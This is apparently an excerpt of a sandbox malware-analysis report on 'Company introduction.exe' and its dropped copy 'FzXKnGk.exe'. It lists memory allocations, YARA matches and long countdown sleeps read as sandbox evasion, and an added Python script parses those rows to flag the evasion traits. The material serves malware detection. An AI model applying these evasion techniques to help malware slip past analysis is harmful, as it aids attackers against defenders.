                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: Company introduction.exe PID: 7452, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: FzXKnGk.exe PID: 7888, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Company introduction.exe Memory allocated: 14B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Company introduction.exe Memory allocated: 3260000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Company introduction.exe Memory allocated: 3180000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Company introduction.exe Memory allocated: 8680000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Company introduction.exe Memory allocated: 7C30000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Company introduction.exe Memory allocated: 9680000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Company introduction.exe Memory allocated: A680000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Company introduction.exe Memory allocated: AB20000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Company introduction.exe Memory allocated: BB20000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Company introduction.exe Memory allocated: CB20000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Company introduction.exe Memory allocated: 15F0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Company introduction.exe Memory allocated: 30A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Company introduction.exe Memory allocated: 2F30000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Memory allocated: D10000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Memory allocated: 2960000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Memory allocated: D10000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Memory allocated: 7340000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Memory allocated: 8340000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Memory allocated: 84E0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Memory allocated: 94E0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Memory allocated: 9AE0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Memory allocated: AAE0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Memory allocated: 1830000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Memory allocated: 3340000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Memory allocated: 3110000 memory reserve | memory write watch
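                The "Memory allocated ... memory write watch" and "Thread delayed" rows in this section are the raw evidence behind the report's "Allocates memory with a write watch" and "Contains long sleeps (>= 3 min)" signatures. The script below is an added example by the editor, not part of the Joe Sandbox report or its detection logic: it parses rows in the form shown here (pasted from the behaviour table, with or without the trailing "Jump to behavior" link label) and summarises, per process, the write-watch reservations, the infinite waits, the longest single delay, and the longest strictly decreasing run of delays. Two readings in it are the editor's assumptions: that the delay value 922337203685477 is how an INFINITE relative wait (2^63 units of 100 ns) appears once converted to milliseconds, and that a long run of decreasing delays (600000, 599891, 599766, ...) is a loop re-arming its wait with "deadline minus elapsed", which is why skipping individual sleeps does not shorten the overall wait. The sample rows are constructed from rows in this section.

```python
"""Summarise the sandbox-evasion rows ("Memory allocated ... memory write watch",
"Thread delayed: delay time: N") of a Joe Sandbox behaviour listing, per process.

Added example by the editor, not part of the Joe Sandbox report. The sample rows
below are constructed from the rows shown in this section of the report."""
import re
from collections import defaultdict

# Assumption: Joe Sandbox reports an INFINITE wait (NtDelayExecution with the most
# negative 64-bit relative interval, 2**63 units of 100 ns) as this many milliseconds.
INFINITE_MS = 2**63 // 10_000            # 922337203685477
LONG_SLEEP_MS = 3 * 60 * 1000            # the report's "long sleeps (>= 3 min)" threshold

# One behaviour row; the process path may be glued to the next field ("...exeThread delayed")
# and may carry the page's "Jump to behavior" link label at the end.
ROW = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*"
    r"(?:Memory allocated:\s*(?P<addr>[0-9A-Fa-f]+)\s*(?P<flags>.*?)"
    r"|Thread delayed:\s*delay time:\s*(?P<delay>\d+))"
    r"\s*(?:Jump to behavior)?\s*$"
)

# Constructed sample: rows taken from this section of the report.
SAMPLE = r"""
Source: C:\Users\user\Desktop\Company introduction.exeMemory allocated: 14B0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\Company introduction.exeMemory allocated: 3260000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 599891Jump to behavior
Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 599766Jump to behavior
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeMemory allocated: D10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 599871
"""


def parse_rows(text):
    """Yield (process_basename, kind, value) for every recognised row."""
    for line in text.splitlines():
        m = ROW.search(line.strip())
        if not m:
            continue
        proc = m.group("proc").rsplit("\\", 1)[-1]
        if m.group("delay") is not None:
            yield proc, "delay", int(m.group("delay"))
        else:
            yield proc, "alloc", (int(m.group("addr"), 16), m.group("flags").strip())


def longest_decreasing_run(seq):
    """Length of the longest run of consecutive, strictly decreasing values."""
    best = run = 1 if seq else 0
    for prev, cur in zip(seq, seq[1:]):
        run = run + 1 if cur < prev else 1
        best = max(best, run)
    return best


def summarise(text):
    """Per-process indicator counts for the rows in `text`."""
    stats = defaultdict(lambda: {"write_watch_allocs": 0, "infinite_waits": 0,
                                 "max_delay_ms": 0, "long_sleep": False,
                                 "countdown_len": 0})
    delays = defaultdict(list)
    for proc, kind, value in parse_rows(text):
        s = stats[proc]
        if kind == "alloc":
            _addr, flags = value
            # MEM_WRITE_WATCH reservations. Caveat: the .NET CLR garbage collector
            # reserves its heap segments this way, so on a managed sample this row
            # alone is weak evidence; weigh it together with the delay indicators.
            if "write watch" in flags:
                s["write_watch_allocs"] += 1
        elif value == INFINITE_MS:
            s["infinite_waits"] += 1            # thread parked forever (Sleep(INFINITE))
        else:
            delays[proc].append(value)
            s["max_delay_ms"] = max(s["max_delay_ms"], value)
            s["long_sleep"] = s["long_sleep"] or value >= LONG_SLEEP_MS
    # Editor's interpretation: a long strictly decreasing run (600000, 599891, 599766, ...)
    # is a loop that re-arms the wait with "deadline minus elapsed" each pass, so a sandbox
    # that merely shortens single Sleep calls does not shorten the overall wait.
    for proc, seq in delays.items():
        stats[proc]["countdown_len"] = longest_decreasing_run(seq)
    return dict(stats)


if __name__ == "__main__":
    for proc, s in summarise(SAMPLE).items():
        print(proc, s)
```

                Run it on the full behaviour table rather than the excerpt above: the countdown length then grows to the ~50 rows listed for each process, which is the stronger indicator; the write-watch count on its own is expected for any .NET process and should not be scored in isolation.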
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 600000
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 599891
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 599766
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 599641
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 599531
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 599421
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 599306
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 599202
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 599084
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 598953
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 598844
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 598734
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 598625
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 598516
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 598406
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 598281
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 598172
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 598049
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 597922
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 597812
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 597703
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 597594
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 597484
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 597366
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 597250
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 597140
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 597030
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 596922
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 596812
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 596703
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 596594
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 596484
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 596375
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 596266
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 596141
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 596016
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 595906
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 595797
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 595687
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 595578
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 595468
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 595358
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 595250
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 595141
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 595016
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 594891
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 594781
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 594672
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 594562
                Source: C:\Users\user\Desktop\Company introduction.exe Thread delayed: delay time: 594453
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 599871
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 599765
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 599648
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 599545
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 599437
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 599328
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 599218
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 599109
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 598999
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 598890
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 598781
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 598672
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 598546
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 598437
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 598328
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 598218
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 598109
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 597999
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 597884
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe Thread delayed: delay time: 597781
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597671
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597552
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597437
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597328
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597218
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597109
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597000
